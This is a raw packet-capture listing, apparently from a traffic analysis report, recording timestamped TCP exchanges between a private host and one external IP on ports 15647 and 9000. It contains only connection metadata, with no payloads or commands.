                                          Nov 28, 2024 13:40:18.689965963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.772044897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.772241116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.889333963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.889988899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.940747976 CET90004981345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.940943003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.941188097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.973294973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.977969885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.050755024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.053936958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.061049938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.097946882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.101960897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.142551899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.142646074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.228903055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.228959084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.299197912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.299277067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.402786016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.402853966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.424557924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.424608946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.430267096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.430334091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.544095993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.544208050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.594803095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.594983101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.626070976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.626348019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.665380001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.665440083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.717035055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.717137098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.726257086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.726325989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.788116932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.788167000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.846733093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.846779108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.867969036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.868057966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.918340921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.918423891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:19.994076014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:19.994151115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.038954973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.039041042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.086796999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.086982965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.120573044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.120587111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.120628119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.173921108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.206871986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.212929010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.213743925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.240161896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.249026060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.300493956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.308927059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.364115953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.366358995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.429085016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.429442883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.526930094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.526995897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.540225983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.542768002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.549400091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.549520016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.630417109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.630553007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.653127909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.653280020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.669785976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.669878960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.676141024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.676294088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.751357079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.752367973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.753031015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.773314953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.773389101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.789884090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.789975882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.796413898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.854547977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.854762077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.873097897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.876056910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.893517017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.893596888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.909997940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.912098885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.952915907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.954065084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.974915981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.978116989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:20.996062040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:20.996196985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.013540030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.014023066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.032262087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.038007021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.074736118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.074855089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.075128078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.116389990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.118014097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.158133030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.160078049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.176386118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.176462889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.238208055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.238262892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.276000977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.276062965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.296561003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.296658993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.396502972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.396584034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.422347069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.422388077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.491774082 CET90004981345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.491894960 CET90004981345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.491940975 CET498139000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.491978884 CET498139000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.497932911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.497996092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.542404890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.542454958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.596040010 CET498219000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.611911058 CET90004981345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.623708963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.623785973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.703115940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.703195095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.716128111 CET90004982145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.716355085 CET498219000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.716373920 CET498219000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.743607044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.743704081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.744560003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.823211908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.823291063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.836359024 CET90004982145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.863688946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.863861084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.870378971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.922504902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:21.985521078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:21.985603094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.024701118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.024847031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.065041065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.065176010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.147775888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.147948027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.186840057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.186975002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.307077885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.307285070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.308363914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.360997915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.469258070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.469347000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.629848003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.630093098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.670707941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.670954943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.790838957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.790997982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.834896088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.835015059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.913533926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.913645029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.951663971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.951843977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:22.961548090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:22.961639881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.039247036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.039370060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.075251102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.075370073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.083333969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.083530903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.115012884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.115240097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.118244886 CET90004982145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.118395090 CET90004982145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.118493080 CET498219000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.118699074 CET498219000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.195391893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.195447922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.235423088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.235465050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.236206055 CET498259000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.238538980 CET90004982145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.240526915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.240582943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.355715990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.355778933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.356317043 CET90004982545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.356379986 CET498259000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.356519938 CET498259000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.360013008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.406955957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.407001972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.407001972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.436712027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.436772108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.478149891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.478197098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.478929043 CET90004982545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.529786110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.529833078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.557168007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.557230949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.602113008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.602164030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.679996014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.680099010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.704180002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.716677904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.730897903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.730915070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.745599031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.758380890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.760077000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.760149956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.776206017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.791785002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.806229115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.819528103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.833746910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.846318960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.860105038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.872246981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.879178047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879252911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.879354954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879405022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879556894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879565954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879576921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879621983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.879657030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879673958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879683018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879693031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.879776955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.882052898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.882114887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.893647909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.911849976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.911916018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.913324118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.913376093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.927191973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.927252054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.946623087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.946713924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.956171036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.956229925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:23.970662117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.994057894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:23.994168043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.008147001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.008205891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.058404922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.102413893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.102489948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.129578114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.147423983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.150624990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.150684118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.150743008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.150790930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.150883913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.151031017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.151042938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.151335955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.151379108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.172081947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.192034006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.192209005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.209369898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.216716051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.216890097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.218102932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.233617067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.233659983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.236196995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.252197027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.252243042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.252346039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.262598038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.262614012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.266114950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.270438910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.270513058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.270786047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.270962000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.286142111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.286596060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.286717892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.290127993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.290781975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.292381048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.292469025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.310724974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.310817003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.310934067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.331110954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.331202984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.331234932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.353667974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.356136084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.361732006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.361850023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.361890078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.361963987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.365822077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.366875887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.372916937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.374178886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.379848003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.379911900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.380050898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.390537977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.390738964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.390856981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.393045902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.394232988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.409168959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.410413027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.415019035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.416284084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.417932034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.422046900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.434685946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.438790083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.458060980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.468379974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.483283043 CET4973015647192.168.2.445.141.84.168
